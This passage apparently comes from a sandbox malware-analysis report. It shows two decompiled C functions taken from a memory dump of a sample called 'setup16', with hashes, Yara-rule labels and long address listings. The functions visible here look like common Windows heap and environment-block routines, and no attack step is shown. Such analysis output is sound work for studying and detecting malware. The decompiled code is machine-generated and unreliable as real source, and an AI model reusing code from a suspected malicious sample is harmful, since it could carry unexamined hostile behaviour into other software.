                                                                                                                                                                                                        • Opcode ID: 9df9ebdd2864eeab32148297c35947b987f048b960e480b6cba8559126234c1b
                                                                                                                                                                                                        • Instruction ID: 3bba97a28dbdbdfe8c4e443a432ce97c033a5c26b328d74e2459412be5178331
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9df9ebdd2864eeab32148297c35947b987f048b960e480b6cba8559126234c1b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64E1A170A007598FEB25DF28C980BA9B7B6BF85304F0482F9D9099B291D774BD81DF91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049D849B Relevance: .3, Instructions: 290COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E049D849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x4a9f9c0);
				E04A1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4ab7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E049DCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E049E2280( *[fs:0x30], 0x4ab8550);
						_t139 =  *0x4ab7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E049FF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E049DFFB0(_t193, _t235, 0x4ab8550);
								L5:
								return E04A1D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E049C1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4ab7b9c; // 0x0
							_t235 = L049E4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4ab7b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E049FA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E049DFFB0(_t193, _t235, 0x4ab8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L049E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L049E77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4ab7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4ab7b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E04A037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4ab7b9c; // 0x0
									_t214 = L049E4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E04A037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4ab7b10 =  *0x4ab7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4ab7b04 =  *0x4ab7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L049E77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L049E77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4ab7b08 =  *0x4ab7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E04A057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E04A0F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L049E77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E049FA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L049E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E04A096C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                                                                                                                                        0x049d849b
                                                                                                                                                                                                        0x049d849b
                                                                                                                                                                                                        0x049d849b
                                                                                                                                                                                                        0x049d849b
                                                                                                                                                                                                        0x049d849d
                                                                                                                                                                                                        0x049d84a2
                                                                                                                                                                                                        0x049d84a7
                                                                                                                                                                                                        0x049d84b1
                                                                                                                                                                                                        0x049d84d8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d84b3
                                                                                                                                                                                                        0x049d84c4
                                                                                                                                                                                                        0x049d84c9
                                                                                                                                                                                                        0x049d84cd
                                                                                                                                                                                                        0x049d84cf
                                                                                                                                                                                                        0x049d84cf
                                                                                                                                                                                                        0x049d84d6
                                                                                                                                                                                                        0x049d84e6
                                                                                                                                                                                                        0x049d84e9
                                                                                                                                                                                                        0x049d84ec
                                                                                                                                                                                                        0x049d84ef
                                                                                                                                                                                                        0x049d84f2
                                                                                                                                                                                                        0x049d84f4
                                                                                                                                                                                                        0x049d84fc
                                                                                                                                                                                                        0x049d8501
                                                                                                                                                                                                        0x049d8506
                                                                                                                                                                                                        0x049d8509
                                                                                                                                                                                                        0x049d86e0
                                                                                                                                                                                                        0x049d86e5
                                                                                                                                                                                                        0x049d86e8
                                                                                                                                                                                                        0x049d86ed
                                                                                                                                                                                                        0x049d86f0
                                                                                                                                                                                                        0x049d86f2
                                                                                                                                                                                                        0x04a29afd
                                                                                                                                                                                                        0x04a29b02
                                                                                                                                                                                                        0x049d84da
                                                                                                                                                                                                        0x049d84df
                                                                                                                                                                                                        0x049d84df
                                                                                                                                                                                                        0x049d86fa
                                                                                                                                                                                                        0x049d86fd
                                                                                                                                                                                                        0x049d86fe
                                                                                                                                                                                                        0x049d8701
                                                                                                                                                                                                        0x049d8706
                                                                                                                                                                                                        0x049d8709
                                                                                                                                                                                                        0x049d870b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8711
                                                                                                                                                                                                        0x049d8725
                                                                                                                                                                                                        0x049d8727
                                                                                                                                                                                                        0x049d872a
                                                                                                                                                                                                        0x049d872c
                                                                                                                                                                                                        0x04a29af0
                                                                                                                                                                                                        0x04a29af5
                                                                                                                                                                                                        0x049d8732
                                                                                                                                                                                                        0x049d8732
                                                                                                                                                                                                        0x049d8732
                                                                                                                                                                                                        0x049d8735
                                                                                                                                                                                                        0x049d8737
                                                                                                                                                                                                        0x049d8515
                                                                                                                                                                                                        0x049d8515
                                                                                                                                                                                                        0x049d8518
                                                                                                                                                                                                        0x049d851d
                                                                                                                                                                                                        0x049d8523
                                                                                                                                                                                                        0x049d8527
                                                                                                                                                                                                        0x049d852b
                                                                                                                                                                                                        0x049d8537
                                                                                                                                                                                                        0x049d8539
                                                                                                                                                                                                        0x049d853c
                                                                                                                                                                                                        0x049d853e
                                                                                                                                                                                                        0x049d868c
                                                                                                                                                                                                        0x049d8691
                                                                                                                                                                                                        0x049d8699
                                                                                                                                                                                                        0x049d869b
                                                                                                                                                                                                        0x049d8744
                                                                                                                                                                                                        0x049d8748
                                                                                                                                                                                                        0x049d86a1
                                                                                                                                                                                                        0x049d86a1
                                                                                                                                                                                                        0x049d86a1
                                                                                                                                                                                                        0x049d86a4
                                                                                                                                                                                                        0x049d86a8
                                                                                                                                                                                                        0x04a29bdf
                                                                                                                                                                                                        0x04a29bdf
                                                                                                                                                                                                        0x049d86ae
                                                                                                                                                                                                        0x049d86b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d86b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a29be9
                                                                                                                                                                                                        0x049d86b0
                                                                                                                                                                                                        0x049d8544
                                                                                                                                                                                                        0x049d854a
                                                                                                                                                                                                        0x049d854d
                                                                                                                                                                                                        0x049d8551
                                                                                                                                                                                                        0x049d876e
                                                                                                                                                                                                        0x049d8778
                                                                                                                                                                                                        0x049d877b
                                                                                                                                                                                                        0x049d8780
                                                                                                                                                                                                        0x049d8557
                                                                                                                                                                                                        0x049d8557
                                                                                                                                                                                                        0x049d855d
                                                                                                                                                                                                        0x049d855d
                                                                                                                                                                                                        0x049d856b
                                                                                                                                                                                                        0x049d856e
                                                                                                                                                                                                        0x049d8570
                                                                                                                                                                                                        0x049d8573
                                                                                                                                                                                                        0x049d8576
                                                                                                                                                                                                        0x049d8576
                                                                                                                                                                                                        0x049d8579
                                                                                                                                                                                                        0x049d857b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8581
                                                                                                                                                                                                        0x049d85a0
                                                                                                                                                                                                        0x049d85a2
                                                                                                                                                                                                        0x049d85a5
                                                                                                                                                                                                        0x049d85a7
                                                                                                                                                                                                        0x04a29b1b
                                                                                                                                                                                                        0x04a29b1b
                                                                                                                                                                                                        0x049d862e
                                                                                                                                                                                                        0x049d862e
                                                                                                                                                                                                        0x049d8631
                                                                                                                                                                                                        0x049d8631
                                                                                                                                                                                                        0x049d8634
                                                                                                                                                                                                        0x049d8636
                                                                                                                                                                                                        0x049d8669
                                                                                                                                                                                                        0x049d8669
                                                                                                                                                                                                        0x049d866b
                                                                                                                                                                                                        0x04a29bbf
                                                                                                                                                                                                        0x04a29bc4
                                                                                                                                                                                                        0x04a29bc8
                                                                                                                                                                                                        0x04a29bce
                                                                                                                                                                                                        0x04a29bce
                                                                                                                                                                                                        0x049d8671
                                                                                                                                                                                                        0x049d8671
                                                                                                                                                                                                        0x049d8674
                                                                                                                                                                                                        0x049d8676
                                                                                                                                                                                                        0x04a29bae
                                                                                                                                                                                                        0x04a29bae
                                                                                                                                                                                                        0x049d8676
                                                                                                                                                                                                        0x049d867c
                                                                                                                                                                                                        0x049d867e
                                                                                                                                                                                                        0x049d8688
                                                                                                                                                                                                        0x049d8688
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d867e
                                                                                                                                                                                                        0x049d8638
                                                                                                                                                                                                        0x049d8638
                                                                                                                                                                                                        0x049d863b
                                                                                                                                                                                                        0x049d863e
                                                                                                                                                                                                        0x049d863f
                                                                                                                                                                                                        0x049d8642
                                                                                                                                                                                                        0x049d8645
                                                                                                                                                                                                        0x049d8648
                                                                                                                                                                                                        0x049d864d
                                                                                                                                                                                                        0x04a29b69
                                                                                                                                                                                                        0x04a29b6e
                                                                                                                                                                                                        0x04a29b7b
                                                                                                                                                                                                        0x04a29b81
                                                                                                                                                                                                        0x04a29b85
                                                                                                                                                                                                        0x04a29b89
                                                                                                                                                                                                        0x04a29ba7
                                                                                                                                                                                                        0x04a29b8b
                                                                                                                                                                                                        0x04a29b91
                                                                                                                                                                                                        0x04a29b9a
                                                                                                                                                                                                        0x04a29b9f
                                                                                                                                                                                                        0x04a29b9f
                                                                                                                                                                                                        0x049d8788
                                                                                                                                                                                                        0x049d878d
                                                                                                                                                                                                        0x049d8763
                                                                                                                                                                                                        0x049d8763
                                                                                                                                                                                                        0x049d8766
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8766
                                                                                                                                                                                                        0x04a29b70
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a29b70
                                                                                                                                                                                                        0x049d8656
                                                                                                                                                                                                        0x049d865a
                                                                                                                                                                                                        0x049d865c
                                                                                                                                                                                                        0x049d8752
                                                                                                                                                                                                        0x049d8756
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d875e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d875e
                                                                                                                                                                                                        0x049d8662
                                                                                                                                                                                                        0x049d8662
                                                                                                                                                                                                        0x049d8662
                                                                                                                                                                                                        0x049d8666
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8666
                                                                                                                                                                                                        0x049d85b7
                                                                                                                                                                                                        0x049d85b9
                                                                                                                                                                                                        0x049d85bc
                                                                                                                                                                                                        0x049d85bf
                                                                                                                                                                                                        0x049d85cc
                                                                                                                                                                                                        0x049d85d1
                                                                                                                                                                                                        0x049d85d4
                                                                                                                                                                                                        0x049d85db
                                                                                                                                                                                                        0x049d85de
                                                                                                                                                                                                        0x049d85e0
                                                                                                                                                                                                        0x04a29b5f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a29b5f
                                                                                                                                                                                                        0x049d85e6
                                                                                                                                                                                                        0x049d85ea
                                                                                                                                                                                                        0x049d86c3
                                                                                                                                                                                                        0x049d86c5
                                                                                                                                                                                                        0x049d86c8
                                                                                                                                                                                                        0x049d86ca
                                                                                                                                                                                                        0x04a29b16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a29b16
                                                                                                                                                                                                        0x049d86d6
                                                                                                                                                                                                        0x049d85f6
                                                                                                                                                                                                        0x049d85f6
                                                                                                                                                                                                        0x049d85f9
                                                                                                                                                                                                        0x049d8602
                                                                                                                                                                                                        0x049d8606
                                                                                                                                                                                                        0x049d860a
                                                                                                                                                                                                        0x049d860b
                                                                                                                                                                                                        0x049d860e
                                                                                                                                                                                                        0x049d8611
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8611
                                                                                                                                                                                                        0x049d85f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d85f3
                                                                                                                                                                                                        0x049d8619
                                                                                                                                                                                                        0x049d861e
                                                                                                                                                                                                        0x049d861e
                                                                                                                                                                                                        0x049d8621
                                                                                                                                                                                                        0x049d8622
                                                                                                                                                                                                        0x049d8623
                                                                                                                                                                                                        0x049d8625
                                                                                                                                                                                                        0x049d862c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d873d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d873d
                                                                                                                                                                                                        0x049d8737
                                                                                                                                                                                                        0x049d850f
                                                                                                                                                                                                        0x049d8512
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8512
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d84d6

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: dc41c5fd712eac278c0c375c5713b95f2a69043fb4b0711cc6f581d3ce6c67a5
                                                                                                                                                                                                        • Instruction ID: f67542b508e6785f3b9adfb0c0d2324ff7d1aed1c68adc902dcbb9fca6f7194c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc41c5fd712eac278c0c375c5713b95f2a69043fb4b0711cc6f581d3ce6c67a5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3B16DB4F00209DFDB19DF99C980AAEBBB9FF88704F108529E415AB256D770B941CF90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F513A Relevance: .3, Instructions: 258COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                                                                                        			E049F513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4abd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E04A0D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E049E2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L049E4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E04A0F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E049DFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4abb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E04A0B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                                                                                                                                        0x049f5142
                                                                                                                                                                                                        0x049f514c
                                                                                                                                                                                                        0x049f5150
                                                                                                                                                                                                        0x049f5157
                                                                                                                                                                                                        0x049f5159
                                                                                                                                                                                                        0x049f515e
                                                                                                                                                                                                        0x049f5165
                                                                                                                                                                                                        0x049f5169
                                                                                                                                                                                                        0x049f516c
                                                                                                                                                                                                        0x049f5172
                                                                                                                                                                                                        0x049f5176
                                                                                                                                                                                                        0x049f517a
                                                                                                                                                                                                        0x049f517a
                                                                                                                                                                                                        0x049f517a
                                                                                                                                                                                                        0x049f517f
                                                                                                                                                                                                        0x04a36d8b
                                                                                                                                                                                                        0x04a36d8e
                                                                                                                                                                                                        0x04a36d91
                                                                                                                                                                                                        0x04a36d95
                                                                                                                                                                                                        0x04a36d98
                                                                                                                                                                                                        0x04a36d9c
                                                                                                                                                                                                        0x04a36da0
                                                                                                                                                                                                        0x04a36da3
                                                                                                                                                                                                        0x04a36da7
                                                                                                                                                                                                        0x04a36e26
